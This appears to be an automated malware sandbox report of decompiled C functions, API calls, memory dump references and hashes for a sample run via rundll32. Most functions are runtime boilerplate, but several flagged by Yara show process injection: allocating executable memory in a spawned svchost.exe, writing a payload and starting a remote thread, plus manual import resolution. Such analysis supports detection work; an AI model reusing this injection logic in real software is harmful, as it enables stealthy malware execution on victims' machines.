                                            			E00181480(void* __eax, void** __edx) {
                                            				void* _t3;
                                            				void** _t8;
                                            				void* _t11;
                                            				long _t14;
                                            
                                            				_t8 = __edx;
                                            				if(__eax >= 0x100000) {
                                            					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                            				} else {
                                            					_t14 = 0x100000;
                                            				}
                                            				_t8[1] = _t14;
                                            				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                            				_t11 = _t3;
                                            				 *_t8 = _t11;
                                            				if(_t11 != 0) {
                                            					_t3 = E00181334(0x1945e4, _t8);
                                            					if(_t3 == 0) {
                                            						VirtualFree( *_t8, 0, 0x8000);
                                            						 *_t8 = 0;
                                            						return 0;
                                            					}
                                            				}
                                            				return _t3;
                                            			}








                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00181789), ref: 001814AF
                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00181789), ref: 001814D6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 14aa39a322f48f03e6ebc4bc4b7e4328b9ae93e5cb59381289912d88427ff9d6
                                            • Instruction ID: 038664f1c52f34b431cfae2afcba5726ef8fed4ea16560b08cd8b5ad380a0cf4
                                            • Opcode Fuzzy Hash: 14aa39a322f48f03e6ebc4bc4b7e4328b9ae93e5cb59381289912d88427ff9d6
                                            • Instruction Fuzzy Hash: E8F08273A006207BEB307A6A4C85F52668A9F957A0F154171BA0CEF3C9D7618D034BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00185298(intOrPtr* __eax, void* __edx) {
                                            				char _v1032;
                                            				int _t13;
                                            				void* _t22;
                                            
                                            				_t21 = __edx;
                                            				if(__eax != 0) {
                                            					if( *(__eax + 4) >= 0x10000) {
                                            						return E00183B78(__edx,  *(__eax + 4));
                                            					}
                                            					_t13 = LoadStringA(E00184840( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
                                            					return E00183A70(_t21, _t13, _t22);
                                            				}
                                            				return __eax;
                                            			}







                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: LoadString
                                            • String ID:
                                            • API String ID: 2948472770-0
                                            • Opcode ID: 708a8b2df4ea6c41cdd60a99455ff971cd36803135797d657e3058d62c6a7319
                                            • Instruction ID: abe65c205d79b820b5ebc17fe67267844db4ede6ee07847295ece15677b0a625
                                            • Opcode Fuzzy Hash: 708a8b2df4ea6c41cdd60a99455ff971cd36803135797d657e3058d62c6a7319
                                            • Instruction Fuzzy Hash: 8AF030B17105109BCB00FA9CC8D2B5A73D9AB59705F188061B658DB356DF70DE058B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001847F8(void* __eax) {
                                            				char _v272;
                                            				intOrPtr _t14;
                                            				void* _t16;
                                            				intOrPtr _t18;
                                            				intOrPtr _t19;
                                            
                                            				_t16 = __eax;
                                            				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                            					_t3 = _t16 + 4; // 0x180000
                                            					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                            					_t14 = E00184A34(_t19); // executed
                                            					_t18 = _t14;
                                            					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                            					if(_t18 == 0) {
                                            						_t5 = _t16 + 4; // 0x180000
                                            						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                            					}
                                            				}
                                            				return  *((intOrPtr*)(_t16 + 0x10));
                                            			}









                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00180000,?,00000105), ref: 00184816
                                              • Part of subcall function 00184A34: GetModuleFileNameA.KERNEL32(00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A50
                                              • Part of subcall function 00184A34: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A6E
                                              • Part of subcall function 00184A34: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A8C
                                              • Part of subcall function 00184A34: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00184AAA
                                              • Part of subcall function 00184A34: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00184AF3
                                              • Part of subcall function 00184A34: RegQueryValueExA.ADVAPI32(?,00184CA0,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00184B39,?,80000001), ref: 00184B11
                                              • Part of subcall function 00184A34: RegCloseKey.ADVAPI32(?,00184B40,00000000,?,?,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00184B33
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Open$FileModuleNameQueryValue$Close
                                            • String ID:
                                            • API String ID: 2796650324-0
                                            • Opcode ID: b6b7299d0514e830f97bb4106cf1170470194b70054758366a670915ed80ae09
                                            • Instruction ID: 81b8c47d04d143abc81caabaabe73a65ef7c1e363347f332c05d8ac40ed6c69b
                                            • Opcode Fuzzy Hash: b6b7299d0514e830f97bb4106cf1170470194b70054758366a670915ed80ae09
                                            • Instruction Fuzzy Hash: DCE06D71A002119BCB10EEA8C8C1A4633D8AF18750F400965ED54CF24AD7B0DE108BD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00181614(signed int __eax, void** __ecx, intOrPtr __edx) {
                                            				signed int _v20;
                                            				void** _v24;
                                            				void* _t15;
                                            				void** _t16;
                                            				void* _t17;
                                            				signed int _t27;
                                            				intOrPtr* _t29;
                                            				void* _t31;
                                            				intOrPtr* _t32;
                                            
                                            				_v24 = __ecx;
                                            				 *_t32 = __edx;
                                            				_t31 = __eax & 0xfffff000;
                                            				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                            				 *_v24 = _t31;
                                            				_t15 = _v20 - _t31;
                                            				_v24[1] = _t15;
                                            				_t29 =  *0x1945e4; // 0x3d8cdc
                                            				while(_t29 != 0x1945e4) {
                                            					_t7 = _t29 + 8; // 0x1fd0000
                                            					_t17 =  *_t7;
                                            					_t8 = _t29 + 0xc; // 0x100000
                                            					_t27 =  *_t8 + _t17;
                                            					if(_t31 > _t17) {
                                            						_t17 = _t31;
                                            					}
                                            					if(_t27 > _v20) {
                                            						_t27 = _v20;
                                            					}
                                            					if(_t27 > _t17) {
                                            						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                            						if(_t15 == 0) {
                                            							_t16 = _v24;
                                            							 *_t16 = 0;
                                            							return _t16;
                                            						}
                                            					}
                                            					_t29 =  *_t29;
                                            				}
                                            				return _t15;
                                            			}













                                            APIs
                                            • VirtualAlloc.KERNEL32(01FD0000,?,00001000,00000004), ref: 00181681
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: a49e65c2d1f5070f413158ba11d7eaee761102f1cf4fcd629ecdd64c7d3fb9c2
                                            • Instruction ID: 2ac55c0b501b8f6fca074859681f29dd9daa91eab86b128b2cd82b1dbf839ef4
                                            • Opcode Fuzzy Hash: a49e65c2d1f5070f413158ba11d7eaee761102f1cf4fcd629ecdd64c7d3fb9c2
                                            • Instruction Fuzzy Hash: 43117372A047016FC320AF19C980A6AB7EAEFD5750F2AC92CE5D857354E770AD418B41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001C13D0(void* _a4) {
                                            				void* _t2;
                                            				int _t4;
                                            				void* _t5;
                                            
                                            				if( *0x1c715c != 0) {
                                            					_t5 =  *0x1c715c; // 0x390000
                                            					_t4 = HeapFree(_t5, 0, _a4); // executed
                                            					return _t4;
                                            				}
                                            				return _t2;
                                            			}







                                            APIs
                                            • HeapFree.KERNEL32(00390000,00000000,001C1D0D), ref: 001C13E9
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: dbbeed3ac0bc3be5f5f94125f35ad52e9756d719671ceae83491f76ae0ec91de
                                            • Instruction ID: 75e42cfc598cfa7cdf920e758179dc813d2549441a9d561e563fa5195c823687
                                            • Opcode Fuzzy Hash: dbbeed3ac0bc3be5f5f94125f35ad52e9756d719671ceae83491f76ae0ec91de
                                            • Instruction Fuzzy Hash: 6CC01232188208ABD2089F85EC58FAA3BADA705315F084009B6084AAE0C7B5E8D0CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 60%
                                            			E0018487C(char* __eax, intOrPtr __edx) {
                                            				char* _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				struct _WIN32_FIND_DATAA _v334;
                                            				char _v595;
                                            				struct HINSTANCE__* _t37;
                                            				void* _t45;
                                            				char* _t54;
                                            				char* _t64;
                                            				void* _t82;
                                            				struct HINSTANCE__* _t83;
                                            				char* _t89;
                                            				struct HINSTANCE__* _t90;
                                            				char* _t92;
                                            				void* _t93;
                                            				char* _t94;
                                            				void* _t95;
                                            
                                            				_v12 = __edx;
                                            				_v8 = __eax;
                                            				_v16 = _v8;
                                            				_t37 = GetModuleHandleA("kernel32.dll");
                                            				_t90 = _t37;
                                            				if(_t90 == 0) {
                                            					L4:
                                            					if( *_v8 != 0x5c) {
                                            						_t92 = _v8 + 2;
                                            						goto L10;
                                            					} else {
                                            						if( *((char*)(_v8 + 1)) == 0x5c) {
                                            							_t94 = E00184868(_v8 + 2);
                                            							if( *_t94 != 0) {
                                            								_t14 = _t94 + 1; // 0x1
                                            								_t92 = E00184868(_t14);
                                            								if( *_t92 != 0) {
                                            									L10:
                                            									_t82 = _t92 - _v8;
                                            									_push(_t82 + 1);
                                            									_push(_v8);
                                            									_push( &_v595);
                                            									L00181200();
                                            									while( *_t92 != 0) {
                                            										_t89 = E00184868(_t92 + 1);
                                            										_t45 = _t89 - _t92;
                                            										if(_t45 + _t82 + 1 <= 0x105) {
                                            											_push(_t45 + 1);
                                            											_push(_t92);
                                            											_push( &(( &_v595)[_t82]));
                                            											L00181200();
                                            											_t93 = FindFirstFileA( &_v595,  &_v334);
                                            											if(_t93 != 0xffffffff) {
                                            												FindClose(_t93);
                                            												_t54 =  &(_v334.cFileName);
                                            												_push(_t54);
                                            												L00181208();
                                            												if(_t54 + _t82 + 1 + 1 <= 0x105) {
                                            													 *((char*)(_t95 + _t82 - 0x24f)) = 0x5c;
                                            													_push(0x105 - _t82 - 1);
                                            													_push( &(_v334.cFileName));
                                            													_push( &(( &(( &_v595)[_t82]))[1]));
                                            													L00181200();
                                            													_t64 =  &(_v334.cFileName);
                                            													_push(_t64);
                                            													L00181208();
                                            													_t82 = _t82 + _t64 + 1;
                                            													_t92 = _t89;
                                            													continue;
                                            												}
                                            											}
                                            										}
                                            										goto L17;
                                            									}
                                            									_push(_v12);
                                            									_push( &_v595);
                                            									_push(_v8);
                                            									L00181200();
                                            								}
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					_push("GetLongPathNameA");
                                            					_push(_t90);
                                            					L001811D8();
                                            					_t83 = _t37;
                                            					if(_t83 == 0) {
                                            						goto L4;
                                            					} else {
                                            						_push(0x105);
                                            						_push( &_v595);
                                            						_push(_v8);
                                            						if(_t83->i() == 0) {
                                            							goto L4;
                                            						} else {
                                            							_push(_v12);
                                            							_push( &_v595);
                                            							_push(_v8);
                                            							L00181200();
                                            						}
                                            					}
                                            				}
                                            				L17:
                                            				return _v16;
                                            			}





















                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00184899
                                            • 7248FFF6.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 001848AA
                                            • lstrcpyn.KERNEL32(?,?,?,?,00184ADC,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 001848DA
                                            • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 0018493E
                                            • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39,?,80000001), ref: 00184973
                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000,00184B39), ref: 00184986
                                            • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC,00000000), ref: 00184993
                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,01FD0A4C,0019309C,?,00184ADC), ref: 0018499F
                                            • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 001849D3
                                            • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 001849DF
                                            • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 00184A01
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpyn$Findlstrlen$7248CloseFileFirstHandleModule
                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                            • API String ID: 1159896795-1565342463
                                            • Opcode ID: 6469e9139b0c1bed7657c93febbcad042d67a0a565f83e0d9b85ea9d6514cf4f
                                            • Instruction ID: 8c44691ffab61dd87489ac8817aaa2cd2c5d604620f9fe96f7d94913fa49cf5b
                                            • Opcode Fuzzy Hash: 6469e9139b0c1bed7657c93febbcad042d67a0a565f83e0d9b85ea9d6514cf4f
                                            • Instruction Fuzzy Hash: 04417C72D0025AABDB20FAA8CC89ADEB7EDEF59354F1401A1E949E7141EB309F418F54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E001C3880(void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				void* _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				void* _v20;
                                            				void* _v24;
                                            				void* _v28;
                                            				char _v32;
                                            				long _v36;
                                            
                                            				if(_a12 == 0) {
                                            					_v8 = VirtualAlloc(0, _a8, 0x3000, 0x40);
                                            					if(_v8 == 0) {
                                            						L14:
                                            						return 0;
                                            					}
                                            					E001C1450(_v8, _a4, _a8);
                                            					if(_a16 == 0) {
                                            						_v28 = _v8;
                                            						_v28();
                                            						return 1;
                                            					}
                                            					_v24 = CreateThread(0, 0, E001C39E0, _v8, 0, 0);
                                            					if(_v24 == 0) {
                                            						goto L14;
                                            					}
                                            					CloseHandle(_v24);
                                            					return 1;
                                            				}
                                            				if(E001C2C40( &_v16,  &_v32) != 0) {
                                            					_v12 = VirtualAllocEx(_v16, 0, _a8, 0x3000, 0x40);
                                            					if(_v12 == 0 || WriteProcessMemory(_v16, _v12, _a4, _a8, 0) == 0) {
                                            						L7:
                                            						goto L14;
                                            					} else {
                                            						_v20 = CreateRemoteThread(_v16, 0, 0, _v12, 0, 0,  &_v36);
                                            						if(_v20 == 0) {
                                            							goto L7;
                                            						}
                                            						CloseHandle(_v20);
                                            						return 1;
                                            					}
                                            				}
                                            				return 0;
                                            			}












                                            APIs
                                            • VirtualAllocEx.KERNEL32(00500000,00000000,00500000,00003000,00000040,?,?,?,?,?,001C1FB7), ref: 001C38BC
                                            • WriteProcessMemory.KERNEL32(00500000,00000000,00000000,00500000,00000000,?,?,?,?,?,001C1FB7), ref: 001C38DD
                                            • CreateRemoteThread.KERNEL32(00500000,00000000,00000000,00000000,00000000,00000000,?), ref: 001C38FB
                                            • CloseHandle.KERNEL32(00000000), ref: 001C390E
                                            • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000040,?,?,?,001C1FB7), ref: 001C392A
                                            • CreateThread.KERNEL32(00000000,00000000,001C39E0,00000000,00000000,00000000), ref: 001C3964
                                            • CloseHandle.KERNEL32(00000000), ref: 001C3977
                                              • Part of subcall function 001C2C40: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 001C2C71
                                              • Part of subcall function 001C2C40: lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 001C2C83
                                              • Part of subcall function 001C2C40: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 001C2CA9
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Create$AllocCloseHandleProcessThreadVirtual$EnvironmentMemoryRemoteVariableWritelstrcat
                                            • String ID:
                                            • API String ID: 2742758278-0
                                            • Opcode ID: 43c1543a0bbdca5a34f4da0b318a2447d76e9f1c9797deaf4808f2782165e1ec
                                            • Instruction ID: 6539c165327b1d4277637ec423453e6b6fe0be788b5a9450cd9376c4db4a151e
                                            • Opcode Fuzzy Hash: 43c1543a0bbdca5a34f4da0b318a2447d76e9f1c9797deaf4808f2782165e1ec
                                            • Instruction Fuzzy Hash: B3315875A44208FBEB14CFA4CC59FAE77B8AB58704F10851CF619AA280D3B0DB80CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E001C3270(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                            				void* _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				long _v20;
                                            				intOrPtr _v24;
                                            				long _v28;
                                            				void* _t57;
                                            				void* _t59;
                                            				void* _t92;
                                            				void* _t93;
                                            
                                            				_t3 = _a8 + 0x3c; // 0xf445c7f8
                                            				_v24 = _a8 +  *_t3;
                                            				_v16 =  *((intOrPtr*)(_v24 + 0x34));
                                            				_v20 =  *((intOrPtr*)(_v24 + 0x50));
                                            				_v12 = 0;
                                            				_v8 = 0;
                                            				_v28 = 0;
                                            				while(1) {
                                            					_v8 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40);
                                            					if(_v8 == 0) {
                                            						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
                                            						_v16 = _v8;
                                            					}
                                            					if(_v8 == 0) {
                                            						break;
                                            					}
                                            					_t57 = E001C1390(_v20);
                                            					_t93 = _t92 + 4;
                                            					_v12 = _t57;
                                            					if(_v12 != 0) {
                                            						_t59 = E001C3A00(_a8, _a12, _v12, _v16);
                                            						_t92 = _t93 + 0x10;
                                            						if(_t59 == 0) {
                                            						} else {
                                            							if(_a16 != 0) {
                                            								 *_a16 = _v16;
                                            							}
                                            							if(_a20 != 0) {
                                            								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
                                            							}
                                            							if(WriteProcessMemory(_a4, _v8, _v12, _v20, 0) != 0) {
                                            								_v28 = 1;
                                            								if(0 != 0) {
                                            									continue;
                                            								}
                                            							} else {
                                            							}
                                            						}
                                            					} else {
                                            					}
                                            					L17:
                                            					if(_v12 != 0) {
                                            						E001C13D0(_v12);
                                            					}
                                            					if(_v8 != 0 && _v28 == 0) {
                                            						VirtualFreeEx(_a4, _v8, 0, 0x8000);
                                            					}
                                            					return _v28;
                                            				}
                                            				goto L17;
                                            			}














                                            APIs
                                            • VirtualAllocEx.KERNEL32(00000000,001C1ECF,FFFFFFFF,00003000,00000040), ref: 001C32BC
                                            • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 001C32DC
                                              • Part of subcall function 001C1390: GetProcessHeap.KERNEL32(?,001C1886,00100000), ref: 001C139C
                                              • Part of subcall function 001C1390: RtlAllocateHeap.NTDLL(00390000,00000000,001C1886,?,001C1886,00100000), ref: 001C13BD
                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 001C3361
                                            • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 001C33A9
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                                            • String ID:
                                            • API String ID: 2713107948-0
                                            • Opcode ID: ddd4df55629f3073fe6d2b8d3f95488576472eae4c15ac5b1764e5f1d1aa83d7
                                            • Instruction ID: 45b3f62a40bb877f0f4364d6c79eaaf5e40cf1ed5e94e1bc796ee10232f78915
                                            • Opcode Fuzzy Hash: ddd4df55629f3073fe6d2b8d3f95488576472eae4c15ac5b1764e5f1d1aa83d7
                                            • Instruction Fuzzy Hash: CF41F9B5A00209EFDB14DF94C895FAEBBB5BB58304F20815CE915A7280D774EB80CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001C3580(intOrPtr _a4) {
                                            				intOrPtr* _v8;
                                            				struct HINSTANCE__* _v12;
                                            				void* _v16;
                                            				signed int* _v20;
                                            				_Unknown_base(*)()* _v24;
                                            				CHAR* _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr* _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            
                                            				_v32 = _a4;
                                            				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
                                            				_v40 = _v36 + 0xbadc25;
                                            				_v44 =  *_v40;
                                            				_v8 = _a4 + _v44;
                                            				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                            					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
                                            					_v12 = 0;
                                            					_v12 = GetModuleHandleA(_v28);
                                            					if(_v12 == 0) {
                                            						_v12 = LoadLibraryA(_v28);
                                            					}
                                            					if(_v12 != 0) {
                                            						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
                                            						_v20 = _a4 +  *_v8;
                                            						if( *_v8 == 0) {
                                            							_v20 = _v16;
                                            						}
                                            						while( *_v16 != 0) {
                                            							_v48 = _a4 +  *_v20;
                                            							_v24 = 0;
                                            							if(( *_v20 & 0x80000000) == 0) {
                                            								_v24 = GetProcAddress(_v12, _v48 + 2);
                                            							} else {
                                            								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
                                            							}
                                            							if( *_v16 != _v24) {
                                            								 *_v16 = _v24;
                                            							}
                                            							_v16 = _v16 + 4;
                                            							_v20 =  &(_v20[1]);
                                            						}
                                            						_v8 = _v8 + 0x14;
                                            						continue;
                                            					} else {
                                            						return 0;
                                            					}
                                            				}
                                            				return 1;
                                            			}















                                            APIs
                                            • GetModuleHandleA.KERNEL32(?), ref: 001C35DF
                                            • LoadLibraryA.KERNEL32(?), ref: 001C35F2
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 001C3663
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 001C3679
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$HandleLibraryLoadModule
                                            • String ID:
                                            • API String ID: 384173800-0
                                            • Opcode ID: 7aa2e56446c14f1a9eb1253e94b2b65db92ee16aecac30b411ff8bb10b9bff3e
                                            • Instruction ID: 481fd84cdc8b4d2cf18a692cb83ca927e9cc75eb9a4d89fb626e7e4ffa821652
                                            • Opcode Fuzzy Hash: 7aa2e56446c14f1a9eb1253e94b2b65db92ee16aecac30b411ff8bb10b9bff3e
                                            • Instruction Fuzzy Hash: ED418574E00219EFCB04CF98C594BADBBB1FF48304F248599D915AB355D734AA81CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E001C2D98() {
                                            				void* _t17;
                                            
                                            				if( *(_t17 - 4) != 0) {
                                            					__imp__CryptDestroyHash( *(_t17 - 4));
                                            					 *(_t17 - 4) = 0;
                                            				}
                                            				if( *(_t17 - 0xc) != 0) {
                                            					CryptDestroyKey( *(_t17 - 0xc));
                                            					 *(_t17 - 0xc) = 0;
                                            				}
                                            				if( *(_t17 - 8) != 0) {
                                            					CryptReleaseContext( *(_t17 - 8), 0);
                                            					 *(_t17 - 8) = 0;
                                            				}
                                            				return  *((intOrPtr*)(_t17 - 0x10));
                                            			}





                                            APIs
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Destroy$ContextHashRelease
                                            • String ID:
                                            • API String ID: 3577760690-0
                                            • Opcode ID: ff9120fe552d41ecd68b76242c4ea52d2ede3d1b14341efcc400908728c3ec48
                                            • Instruction ID: 43df610eb92f586abccb3463cecde9d6d4d36afff5c0e0b023f089d6f38fc795
                                            • Opcode Fuzzy Hash: ff9120fe552d41ecd68b76242c4ea52d2ede3d1b14341efcc400908728c3ec48
                                            • Instruction Fuzzy Hash: CCF0A5B5944208EBEF24CFE4D95CFEDBBB4AB24305F108488E60667790C7798A94DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E001C2D17() {
                                            				void* _t17;
                                            
                                            				if( *(_t17 - 4) != 0) {
                                            					__imp__CryptDestroyHash( *(_t17 - 4));
                                            					 *(_t17 - 4) = 0;
                                            				}
                                            				if( *(_t17 - 0xc) != 0) {
                                            					CryptDestroyKey( *(_t17 - 0xc));
                                            					 *(_t17 - 0xc) = 0;
                                            				}
                                            				if( *(_t17 - 8) != 0) {
                                            					CryptReleaseContext( *(_t17 - 8), 0);
                                            					 *(_t17 - 8) = 0;
                                            				}
                                            				return  *((intOrPtr*)(_t17 - 0x10));
                                            			}




                                            APIs
